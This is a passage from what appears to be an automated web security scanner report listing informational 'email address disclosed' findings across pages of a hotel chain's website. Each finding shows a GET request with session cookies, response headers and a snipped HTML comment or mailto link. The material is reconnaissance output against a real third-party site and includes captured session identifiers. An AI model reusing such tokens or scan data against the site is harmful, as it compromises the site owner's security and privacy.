E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.7. http://www.redcarnationhotels.com/careers/hr-podcast  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/hr-podcast

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/hr-podcast HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/careers
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:39:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:39:22 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>HR Podcasts</title>
<meta http-
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.8. http://www.redcarnationhotels.com/careers/join-the-family  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/join-the-family

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/join-the-family HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/careers
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:39:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:39:45 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Join the Family - Red Carnation
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.9. http://www.redcarnationhotels.com/careers/rewards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/rewards

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/rewards HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/careers
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:39:57 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:39:57 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Rewards and Perks - Red Carnati
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.10. http://www.redcarnationhotels.com/careers/rewards/benefits  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/rewards/benefits

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/rewards/benefits HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:40:59 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:40:59 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Employee Benefits - Red Carnati
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.11. http://www.redcarnationhotels.com/careers/rewards/equal-opportunities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/rewards/equal-opportunities

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/rewards/equal-opportunities HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:41:09 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:41:09 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Equal Opportunities - Red Carna
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.12. http://www.redcarnationhotels.com/careers/training  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/training

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/training HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/careers
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:40:07 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:40:07 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Training and Development - Red
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.13. http://www.redcarnationhotels.com/careers/training/internal-training  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/training/internal-training

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/training/internal-training HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:42:17 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:42:17 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26768

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Internal Training Qualification
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.14. http://www.redcarnationhotels.com/careers/training/international-qualifications  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/training/international-qualifications

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/training/international-qualifications HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:42:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:42:10 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>International Training Qualific
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.15. http://www.redcarnationhotels.com/careers/training/management-programmes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/training/management-programmes

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/training/management-programmes HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:41:21 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:41:21 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Management Training Programmes
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.16. http://www.redcarnationhotels.com/careers/training/management-programmes/management1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/training/management-programmes/management1

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/training/management-programmes/management1 HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:41:36 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:41:36 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Management Programme 1 - Red Ca
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.17. http://www.redcarnationhotels.com/careers/training/placements  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /careers/training/placements

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/training/placements HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:41:21 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:41:21 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Work Placements - Red Carnation
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.18. http://www.redcarnationhotels.com/christmas_hotel_london  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /christmas_hotel_london

Issue detail

The following email address was disclosed in the response:

Request

GET /christmas_hotel_london HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/site-map
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 03:02:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 03:02:23 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Christmas Hotels London, Christ
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.19. http://www.redcarnationhotels.com/christmas_hotel_london/special-events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /christmas_hotel_london/special-events

Issue detail

The following email address was disclosed in the response:

Request

GET /christmas_hotel_london/special-events HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/christmas_hotel_london/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=1123e76121db81737afdd2b0dc444030;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:37:11 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:37:11 GMT
Cache-Control: private, no-store
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Christmas Hotels London - Festi
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.20. http://www.redcarnationhotels.com/company-information/about-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/about-us

Issue detail

The following email address was disclosed in the response:

Request

GET /company-information/about-us HTTP/1.1
Host: www.redcarnationhotels.com
Proxy-Connection: keep-alive
Referer: http://www.redcarnationhotels.com/contact-us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utmb=187643563

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:26:38 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:26:38 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=82ce90c3c11b5efd5148ad5a7c4d51a6; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Hotel Chains, Red Carnat
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.21. http://www.redcarnationhotels.com/company-information/about-us/core-values  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/about-us/core-values

Issue detail

The following email address was disclosed in the response:

Request

GET /company-information/about-us/core-values HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/company-information/about-us
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:29:40 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:29:40 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=30232f972f5c685430fc1263c5cd98ae; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Core Values - Red Carnation Hot
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.22. http://www.redcarnationhotels.com/company-information/about-us/history  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/about-us/history

Issue detail

The following email address was disclosed in the response:

Request

GET /company-information/about-us/history HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/company-information/about-us
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:28:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:28:10 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=5a2ce72c18fca6ac297fdedd29d07689; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>History - Red Carnation Hotels<
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.23. http://www.redcarnationhotels.com/company-information/accessibility-info  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/accessibility-info

Issue detail

The following email address was disclosed in the response:

Request

GET /company-information/accessibility-info HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:28:08 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:28:08 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=a88ef9e0350b896e3c0fa96606c8227c; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Web Accessibility policy ... Re
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
6.24. http://www.redcarnationhotels.com/company-information/best-rate-guarantee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/best-rate-guarantee

Issue detail

The following email addresses were disclosed in the response:

Request

GET /company-information/best-rate-guarantee HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:27:36 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:27:36 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=6dcfbf58c508edc87108024a44bd1004; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Best Rate Guarantee</title>
<me
...[SNIP]...
<!--
===================================
Designed & built by Pod1
Tel: 0870 246 2066
E-mail: info@pod1.com
Web: http://www.pod1.com
===================================
-->
...[SNIP]...
<a href="mailto:priceguarantee@rchmail.com">priceguarantee@rchmail.com</a>
...[SNIP]...
<a href="mailto:priceguarantee@rchmail.com">priceguarantee@rchmail.com</a>
...[SNIP]...
6.25. http://www.redcarnationhotels.com/company-information/disclaimer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarnationhotels.com
Path:   /company-information/disclaimer

Issue detail

The following email address was disclosed in the response:

Request

GET /company-information/disclaimer HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
